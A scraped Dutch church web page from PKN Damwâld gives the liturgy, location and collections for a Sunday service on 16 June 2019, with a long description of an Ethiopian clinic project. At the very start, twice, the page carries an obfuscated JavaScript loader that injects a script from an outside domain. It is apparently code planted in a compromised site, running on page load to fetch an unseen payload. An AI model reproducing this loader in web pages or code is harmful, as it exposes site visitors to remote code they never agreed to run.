;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 16 juni 2019 14:00 uur - PKN Damwâld
zondag 16 juni 2019
14:00 uur

Kerkdienst zondag 16 juni 2019 14:00 uur

Informatie

Voorganger:Ds. G.J. Otter
Liturgie
Lied voor de dienst Gezang 255 : 1 en 2
Welkom
We zingen: Psalm 138 : 1 en 4
Stil Gebed, Votum en Groet
We zingen: Gezang 50 : 1, 3 en 4
Geloofsbelijdenis
We zingen: Psalm 136 : 1, 6 en 8
Gebed
We lezen: 1 Sam. 25: 1 - 19
We zingen: Elb 185 : 1, 2 en 4
Preek .
We zingen: Psalm 73 : 8 en 9
Dankzegging en voorbede
Collecte
We zingen: Elb 186 b : 1 en 2
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Ethiopië

Ethiopië - Gezondheidsprogramma in één van de armste gebieden ( Project 10 27)
De regio Benishangul-Gumuz is een gebied zo groot als Nederland met circa 800.000 inwoners. Het ligt erg afgelegen op ruim 700 kilometer van Addis Abeba. De armoede in dit gebied is erg hoog. In de hele regio zijn er maar 2 ziekenhuizen, 7 gezondheidscentra, 75 gezondheidsstations (zoals de kliniek van EKHC) en 44 gezondheidsposten. De gezondheidszorg is weinig ontwikkeld in Benishangul-Gumuz. Zowel de kinder- als de moedersterfte rond de geboorte is hoger dan in de rest van Ethiopië. Verder overlijden veel mensen aan malaria, parasieten en door problemen met de luchtwegen. De kliniek van de Kale Hewet Kerk is gebouwd in 2008 in het district Homosha. Op dat moment was er in dat gebied geen kliniek, behalve in het nabijgelegen vluchtelingenkamp. In de dorpen in de omgeving waren er geen gezondheidsposten. De gezondheidszorg is destijds begonnen met 1 gezondheidswerker en 1 vroedvrouw. Men begon met het geven van gezondheidsvoorlichting en -bewustwording. Inmiddels is de kliniek behoorlijk uitgebreid: van 4 naar 12 kamers, en het aantal medisch personeel is nu toegenomen naar 7. De kliniek is verantwoordelijk voor de gezondheidszorg in een gebied van 12.000 personen. Er vallen 4 gezondheidsposten in de 4 dorpen onder de verantwoordelijkheid van de kliniek. Hier werken gezondheidswerkers van de overheid die worden getraind en toegerust door de kliniek. In de kliniek is er veel aandacht voor moeder- en kindzorg. Het streven is dat er geen kinderen meer thuis geboren worden, dat moeder en kinderen gevaccineerd worden, dat besmetting van baby's met HIV via de moeder wordt voorkomen en dat de groei van de baby's wordt gemonitord. Er wordt verder in de kliniek gezondheidsvoorlichting gegeven. Zo zijn er bijvoorbeeld in het recente verleden samen met de bevolking latrines gebouwd, zodat er in het hele gebied niet meer in de open ruimte ontlasting ligt. Verder worden mensen geïnformeerd over moeder en kindzorg, het voorkomen van HIV/Aids, het tegengaan van ondervoeding enz. De Christenen die in de kliniek werken, proberen het evangelie door te geven. De kliniek heeft een goede naam in de omgeving.

Tweede collecte: Kerk
Uitganscollecte: Bouwfonds